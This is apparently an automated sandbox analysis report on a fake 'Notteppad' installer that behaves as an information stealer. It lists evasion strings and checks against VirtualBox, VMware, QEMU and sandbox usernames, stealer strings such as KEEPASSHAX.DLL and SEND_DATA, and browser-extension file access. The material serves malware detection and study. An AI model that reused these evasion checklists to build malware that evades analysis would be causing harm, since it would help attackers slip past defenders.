              Source: Binary string: cfgmgr32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255043550.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.289392390.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: oleaut32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253075899.0000000002508000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253137591.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.245986343.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: combase.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.250112415.000000000283E000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.250519069.0000000002AA0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Windows.Storage.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260789377.0000000002833000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.262323104.0000000002E00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb source: rundll32.exe, 00000001.00000003.269181411.0000025AA3900000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQuer
yWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
              Source: Binary string: profapi.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.263650614.0000000000710000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.293014153.0000025AA3510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wmswsock.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.264610622.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: oleaut32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253075899.0000000002508000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253137591.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wuser32.pdb source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248888902.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.249465359.0000000002830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ws2_32.pdbUGP source: Notteppad_SettupX32iX64.exe, 00000000.00000003.253309097.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.253224746.00000000035F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000001.00000003.269724498.0000025AA3818000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007FFC28901244 push rbx; retf 1_2_00007FFC28901246
              Source: Notteppad_SettupX32iX64.exe Static PE information: section name: /4
              Source: nsis_uns6283e8.dll.0.dr Static PE information: section name: .xdata
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006EC7A0 GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress, 0_2_006EC7A0
              Source: Notteppad_SettupX32iX64.exe Static PE information: real checksum: 0x4a1c0 should be: 0x529b6
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe File created: C:\Users\user\AppData\Roaming\nsis_uns6283e8.dll
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006EC7A0 GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress, 0_2_006EC7A0
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

              Malware Analysis System Evasion

              Source: Yara match File source: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.243662510.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: Notteppad_SettupX32iX64.exe PID: 5280, type: MEMORYSTR
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: DIR_WATCH.DLL
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: QEMU-GA.EXE
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: SBIEDLL.DLL
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: API_LOG.DLL
              Source: rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PARTIAL RECORD WITHOUT END(1)PARTIAL RECORD WITHOUT END(2)MISSING START OF FRAGMENTED RECORD(1)MISSING START OF FRAGMENTED RECORD(2)ERROR IN MIDDLE OF RECORDUNKNOWN RECORD TYPE %UCHECKSUM MISMATCHBAD RECORD LENGTHKERNEL32.DLLEXITPROCESS/BIN/RUNTIME.EXERTLGETVERSION%08X.LUA/EXTENSION/%08X.LUA/BIN/I386/STUB.DLL/BIN/KEEPASSHAX.DLL/BIN/I386/STUBMOD.BIN/BIN/I386/COREDLL.BIN/ETC/LICENSE.KEYHTTP:///ETC/PUK.KEYGET13CONNECTIONUPGRADEUPGRADEWEBSOCKETUSER-AGENTCURL/5.9SEC-WEBSOCKET-KEYSEC-WEBSOCKET-VERSIONABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZMACHINEGUIDSOFTWARE\MICROSOFT\CRYPTOGRAPHYISWOW64PROCESS\GLOBAL??ASWHOOK.DLLKLKBDFLTRTP_PROCESS_MONITOR360SELFPROTECTIONV1.0.3705GETREQUESTEDRUNTIMEINFOGETCORVERSIONCORBINDTORUNTIMECLRCREATEINSTANCEWKSCORBINDTORUNTIMEEXV4.0.30319V2.0.50727MSCOREE.DLL%PCOMMANDLINECURRENTDIRECTORY"%S" %S"%S"CREATEWIN32_PROCESSROOT\CIMV2RUNAS.EXE.EXEDUMPFINDSTRICMPPRINTTOSTRING?.\;@%SCJSONWINREGMESSAGEPACKPRELOADPACKAGE_GFRAMEWORKLOADEDDECRYPT_UTF8SEND_DATAREG_EXPORTGCREADFILEGET_ARCHPS_GETPATHSET_COMMITADD_FILEADD_STREAMPATH_EXISTFILE_EXISTPARSE_PATHFS_SEARCHNAMEFILENAMEFILESIZEHIGHFILESIZELOW%S\%S...%S\*.*
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: WQLRANDOMRANDOM NAME%THISISANINVALIDFILENAME?[]<>@\;*!-{}#:/~%%THISISANINVALIDENVIRONMENTVARIABLENAME?[]<>@\;*!-{}#:/~%CMDVRT32.DLLCMDVRT64.DLLWPESPY.DLLVMCHECK.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLDBGHELP.DLLSBIEDLL.DLLSNXHK.DLLAVGHOOKA.DLLAVGHOOKX.DLLTESTAPP.EXEMYAPP.EXEKLAVME.EXETEST.EXEMALWARE.EXESANDBOX.EXEBOT.EXESAMPLE.EXEJOHN DOEVIRUSTEST USERMALTESTMALWARESAND BOXUSERTIMMYPETER WILSONMILOZSMILLERJOHNSONIT-ADMINHONG LEEHAPUBWSEMILYSANDBOXCURRENTUSERTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PC7SILVIASANDBOXC:\A\FOOBAR.GIFC:\A\FOOBAR.DOCC:\A\FOOBAR.BMPC:\123\EMAIL.DOCXC:\123\EMAIL.DOCC:\EMAIL.HTMC:\EMAIL.DOCC:\LOADDLL.EXEC:\TAKE_SCREENSHOT.PS1JOHNKLONE_X64-PCSYSTEMITADMINSWSCWILBERNUMBEROFCORESSELECT * FROM WIN32_PROCESSORVIRTUALQEMUVMWAREVBOXVBOXVBOXVBOXPARALLELS HVPRL HYPERV XENVMMXENVMMVMWAREVMWAREMICROSOFT HVKVMKVMKVMA M IVIRTUALXEN0PARALLELSVMWARESERIALNUMBERSELECT * FROM WIN32_BIOSHVM DOMUVIRTUALBOXMODELSELECT * FROM WIN32_COMPUTERSYSTEMQEMUINNOTEK GMBHMANUFACTURERPROCESSORIDVMWXENVIRTIOSYSTEM\CURRENTCONTROLSET\ENUM\SCSISYSTEM\CURRENTCONTROLSET\ENUM\IDESELECT * FROM CIM_PHYSICALCONNECTOR06/23/99SYSTEMBIOSDATEVIRTUALBOXVIDEOBIOSVERSIONSYSTEMBIOSVERSIONIDENTIFIERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 0\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DESCRIPTION\SYSTEMVBOXSYSTEM\CONTROLSET001\SERVICES\VBOXVIDEOSYSTEM\CONTROLSET001\SERVICES\VBOXSFSYSTEM\CONTROLSET001\SERVICES\VBOXSERVICESYSTEM\CONTROLSET001\SERVICES\VBOXMOUSESYSTEM\CONTROLSET001\SERVICES\VBOXGUESTSOFTWARE\ORACLE\VIRTUALBOX GUEST 
ADDITIONSHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__SYSTEM32\VBOXCONTROL.EXESYSTEM32\VBOXTRAY.EXESYSTEM32\VBOXSERVICE.EXESYSTEM32\VBOXOGLPASSTHROUGHSPU.DLLSYSTEM32\VBOXOGLPACKSPU.DLLSYSTEM32\VBOXOGLFEEDBACKSPU.DLLSYSTEM32\VBOXOGLERRORSPU.DLLSYSTEM32\VBOXOGLCRUTIL.DLLSYSTEM32\VBOXOGLARRAYSPU.DLLSYSTEM32\VBOXOGL.DLLSYSTEM32\VBOXMRXNP.DLLSYSTEM32\VBOXHOOK.DLLSYSTEM32\VBOXDISP.DLLSYSTEM32\DRIVERS\VBOXVIDEO.SYSSYSTEM32\DRIVERS\VBOXSF.SYSSYSTEM32\DRIVERS\VBOXGUEST.SYSSYSTEM32\DRIVERS\VBOXMOUSE.SYS%PROGRAMW6432%\\.\PIPE\VBOXTRAYIPC\\.\VBOXTRAYIPC\\.\PIPE\VBOXMINIRDDN\\.\VBOXGUEST\\.\VBOXMINIRDRDNVBOXTRAYTOOLWNDVBOXTRAYTOOLWNDCLASSVIRTUALBOX SHARED FOLDERSVBOXTRAY.EXEVBOXSERVICE.EXEPCI\VEN_80EE&DEV_CAFEDEVICEIDSELECT * FROM WIN32_PNPENTITYOPENHCD82371SB82441FX82801FBNAMEVEN_VBOXPNPDEVICEIDCAPTIONSELECT * FROM WIN32_PNPDEVICEPNP_BUS_0PCI_BUS_0ACPIBUS_BUS_0SELECT * FROM WIN32_BUSORACLE CORPORATIONPRODUCTSELECT * FROM WIN32_BASEBOARDSOURCESSYSTEMFILENAMESELECT * FROM WIN32_NTEVENTLOGFILEVBOXWDDMVBOXVIDEOW8VBOXVIDEOVBOXVBOXVIRTUALBOXSYSTEMPRODUCTNAMESYSTEMMANUFACTURERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 2\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DEVICEMAP\SCSI\SCSI PORT 1\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0SYSTEM\CONTROLSET001\CONTROL\SYSTEMINFORMATIONVMWARESOFTWARE\VMWARE, INC.\VMWARE TOOLSVMACTHLP.EXEVGAUTHSERVICE.EXEVMWAREUSER.EXEVMWARETRAY.EXEVMTOOLSD.EXEVMWAREVMWAREVDSERVICE.EXEVDAGENT.EXEQEMU-GA.E
              Source: Notteppad_SettupX32iX64.exe, Notteppad_SettupX32iX64.exe, 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK.DLL
              Source: rundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6EXITPROCESSKERNEL32.DLL/ETC/LICENSE.KEYHTTP:///ETC/PUK.KEYMACHINEGUIDSOFTWARE\MICROSOFT\CRYPTOGRAPHYKLKBDFLTRTP_PROCESS_MONITOR360SELFPROTECTION\GLOBAL??ASWHOOK.DLL/BIN/RUNTIME.EXEGET13CONNECTIONUPGRADEUPGRADEWEBSOCKETUSER-AGENTCURL/5.9SEC-WEBSOCKET-KEYSEC-WEBSOCKET-VERSIONABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZRTLGETVERSION%08X.LUA/EXTENSION/%08X.LUA/BIN/I386/STUB.DLL/BIN/AMD64/STUB.DLL/BIN/KEEPASSHAX.DLL/BIN/I386/STUBMOD.BIN/BIN/I386/COREDLL.BIN/BIN/AMD64/COREDLL.BIN/BIN/AMD64/STUBMOD.BIN
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: qemu-ga qemu-ga 0_2_006EC425
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: vbox VBOX 0_2_006EC00E
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: qemu qemu QEMU QEMU 0_2_006EC4B1
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: HARDWARE\ACPI\DSDT\VBOX__ HARDWARE\ACPI\FADT\VBOX__ HARDWARE\ACPI\RSDT\VBOX__ SYSTEM\ControlSet001\Services\VBoxGuest SYSTEM\ControlSet001\Services\VBoxMouse SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxService SYSTEM\ControlSet001\Services\VBoxSF SYSTEM\ControlSet001\Services\VBoxVideo 0_2_006EB48F
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: qemu qemu vmware vbox 0_2_006EB17A
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: System32\drivers\VBoxMouse.sys System32\drivers\VBoxGuest.sys System32\drivers\VBoxSF.sys System32\drivers\VBoxVideo.sys System32\vboxdisp.dll System32\vboxhook.dll System32\vboxmrxnp.dll System32\vboxogl.dll System32\vboxoglarrayspu.dll System32\vboxoglcrutil.dll System32\vboxoglerrorspu.dll System32\vboxoglfeedbackspu.dll System32\vboxoglpackspu.dll System32\vboxoglpassthroughspu.dll System32\vboxservice.exe System32\vboxservice.exe System32\vboxtray.exe System32\VBoxControl.exe 0_2_006EB534
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: vboxvideo VBoxVideoW8 VBoxWddm 0_2_006EBDC6
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: vmtoolsd.exe vmwaretray.exe vmwareuser.exe 0_2_006EC1AC
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: VBOX VBOX VEN_VBOX 0_2_006EB987
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: \\.\VBoxMiniRdrDN \\.\VBoxGuest \\.\pipe\VBoxMiniRdDN \\.\VBoxTrayIPC \\.\pipe\VBoxTrayIPC 0_2_006EB649
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: vbox vmware qemu qemu 0_2_006EAAA5
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: VBoxTrayToolWndClass VBoxTrayToolWnd 0_2_006EB6B1
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: VMWare QEMU QEMU 0_2_006EAF27
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: vboxservice.exe vboxservice.exe vboxtray.exe 0_2_006EB722
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: qemu-ga.exe qemu-ga.exe 0_2_006EC3E5
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: VMwareVMware VBoxVBoxVBox 0_2_006EABFE
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: QEMU QEMU 0_2_006EC386
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: vbox VBOX 0_2_006EBF95
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006EC2FF in eax, dx 0_2_006EC2FF
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006EA998 str word ptr [eax] 0_2_006EA998
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E9100 sidt fword ptr [ebp-08h] 0_2_006E9100
              Source: C:\Windows\System32\rundll32.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Check user administrative privileges: GetTokenInformation,
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006EAAA5 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,StrStrIW,SetupDiGetDeviceRegistryPropertyW,SetupDiGetDeviceRegistryPropertyW,GetLastError,LocalFree,LocalAlloc,StrStrIW,StrStrIW,StrStrIW,StrStrIW,SetupDiEnumDeviceInfo,LocalFree,SetupDiDestroyDeviceInfoList,GetLastError,GetLastError,GetLastError, 0_2_006EAAA5
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E910E sgdt fword ptr [ebp-08h] 0_2_006E910E
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_006E9C88 GetSystemInfo,GetModuleHandleExW,GetCurrentProcess,GetModuleInformation,VirtualQuery,VirtualQuery, 0_2_006E9C88
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe Code function: 0_2_00409BB0 FindFirstFileA,GetLastError,_errno,_errno,_errno,_errno,_errno,_errno, 0_2_00409BB0
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C1828C FindFirstFileW,FindNextFileW, 1_2_00007DF4B3C1828C
              Source: C:\Windows\System32\rundll32.exe Code function: 1_2_00007DF4B3C1782C FindFirstFileW,FindNextFileW,FindClose, 1_2_00007DF4B3C1782C
              Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
              Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
              Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
              Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
              Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
              Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: vboxtray.exe
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: VMware
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: vmwaretray.exe
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: vmtoolsd.exe
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: qemu-ga.exe
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: \\.\VBoxMiniRdrDN
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: VBoxTrayToolWnd
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: VMWARE
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: \\.\VBoxTrayIPC
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273014251.0000000000D50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinke5d05f0c9f}SymbolicLink2;
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: HARDWARE\ACPI\RSDT\VBOX__
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: VBoxTrayToolWndClass
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: \\.\pipe\VBoxTrayIPC
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: System32\drivers\VBoxMouse.sys
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: System32\vboxhook.dll
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: System32\vboxmrxnp.dll
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: vmwareuser.exe
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: qemu-ga
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: System32\drivers\VBoxGuest.sys
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: vmware
              Source: Notteppad_SettupX32iX64.exe Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.273014251.0000000000D50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkSymbolicLink>;
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: WQLrandomRandom name%ThisIsAnInvalidFileName?[]<>@\;*!-{}#:/~%%ThisIsAnInvalidEnvironmentVariableName?[]<>@\;*!-{}#:/~%cmdvrt32.dllcmdvrt64.dllwpespy.dllvmcheck.dllpstorec.dlldir_watch.dllapi_log.dlldbghelp.dllsbiedll.dllsnxhk.dllavghooka.dllavghookx.dlltestapp.exemyapp.exeklavme.exetest.exemalware.exesandbox.exebot.exesample.exeJohn Doevirustest usermaltestmalwaresand boxusertimmyPeter WilsonmilozsMillerJohnsonIT-ADMINHong LeeHAPUBWSEmilySandboxCurrentUserTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PC7SILVIASANDBOXC:\a\foobar.gifC:\a\foobar.docC:\a\foobar.bmpC:\123\email.docxC:\123\email.docC:\email.htmC:\email.docC:\loaddll.exeC:\take_screenshot.ps1JohnKLONE_X64-PCSystemITadminSWSCWilberNumberOfCoresSELECT * FROM Win32_ProcessorvirtualqemuvmwarevboxVBoxVBoxVBoxParallels Hvprl hyperv XenVMMXenVMMVMwareVMwareMicrosoft HvKVMKVMKVMA M IVirtualXen0ParallelsVMWareSerialNumberSELECT * FROM Win32_BIOSHVM domUVirtualBoxModelSELECT * FROM Win32_ComputerSystemQEMUinnotek GmbHManufacturerProcessorIdVMWxenvirtioSystem\CurrentControlSet\Enum\SCSISystem\CurrentControlSet\Enum\IDESELECT * FROM CIM_PhysicalConnector06/23/99SystemBiosDateVIRTUALBOXVideoBiosVersionSystemBiosVersionIdentifierHARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\Description\SystemVBOXSYSTEM\ControlSet001\Services\VBoxVideoSYSTEM\ControlSet001\Services\VBoxSFSYSTEM\ControlSet001\Services\VBoxServiceSYSTEM\ControlSet001\Services\VBoxMouseSYSTEM\ControlSet001\Services\VBoxGuestSOFTWARE\Oracle\VirtualBox Guest 
